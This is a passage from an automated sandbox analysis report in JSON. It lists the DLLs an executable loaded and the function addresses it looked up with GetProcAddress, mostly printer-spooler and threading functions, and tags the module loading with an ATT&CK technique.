\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"WTSAPI32.DLL\" at base 737c0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"RSTRTMGR.DLL\" at base 72690000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"NETAPI32.DLL\" at base 739b0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"WKSCLI\" at base 73960000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"SRVCLI\" at base 74ec0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"SAMCLI\" at base 73200000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"NETUTILS\" at base 73970000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"LOGONCLI\" at base 74b20000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"ACTIVEDS.DLL\" at base 6c4a0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 754c0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"WININET.DLL\" at base 76d60000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"WSOCK32.DLL\" at base 70650000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"WS2_32\" at base 766f0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"MPR.DLL\" at base 71a60000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"WINSPOOL.DRV\" at base 718b0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"GPEDIT.DLL\" at base 6a2f0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"ADVAPI32.DLL\" at base 75600000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"RPCRT4.DLL\" at base 76c60000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"NETUTILS.DLL\" at base 73970000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"PROFAPI.DLL\" at base 752d0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"CRYPTBASE.DLL\" at base 751c0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d90000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"CLBCATQ.DLL\" at base 77330000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77250000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6d330000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6d6e0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76ac0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"CRYPTSP.DLL\" at base 74cd0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a60000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"KERNEL32.DLL\" at base 77250000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75260000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6d120000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetDefaultPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetDefaultPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverPackagePathW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CorePrinterDriverInstalledW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetCorePrinterDriversW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter UploadPrinterDriverPackageW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter InstallPrinterDriverFromPackageW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPrinterConnection2W (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter OpenPrinter2W (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterKeyW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDataExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPrinterKeyW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDataExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetPrinterDataExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetPrinterDataExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDataW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDataW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SpoolerPrinterEvent (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetPortW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DocumentPropertySheets (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DevicePropertySheets (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter IsValidDevmodeW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter IsValidDevmodeA (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPortExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrintProvidorW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPrintProvidorW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrintProcessorW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeleteMonitorW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddMonitorW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter StartDocDlgW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AdvancedDocumentPropertiesW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AdvancedDocumentPropertiesA (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DocumentPropertiesW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeviceCapabilitiesW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterIC (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter PlayGdiScriptOnPrinterIC (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter CreatePrinterIC (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetJobW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetJobW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumJobsW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverDirectoryW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPrintersW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPrinterConnectionW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterConnectionW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPrinterDriverExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPrinterDriverExA (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDriversW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPrintProcessorW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPrintProcessorsW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetPrintProcessorDirectoryW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPrintProcessorDatatypesW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SplDriverUnloadComplete (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter OpenPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter OpenPrinterA (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter ResetPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter StartDocPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FlushPrinter (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetPrinterDataW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetPrinterDataW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddJobW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter ScheduleJob (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter WaitForPrinterChange (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter FindNextPrinterChangeNotification (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter PrinterMessageBoxW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter ClosePrinter (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddFormW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeleteFormW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetFormW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetFormW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumFormsW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumPortsW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EnumMonitorsW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter AddPortW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter ConfigurePortW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePortW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetPrinterW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverPackageW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 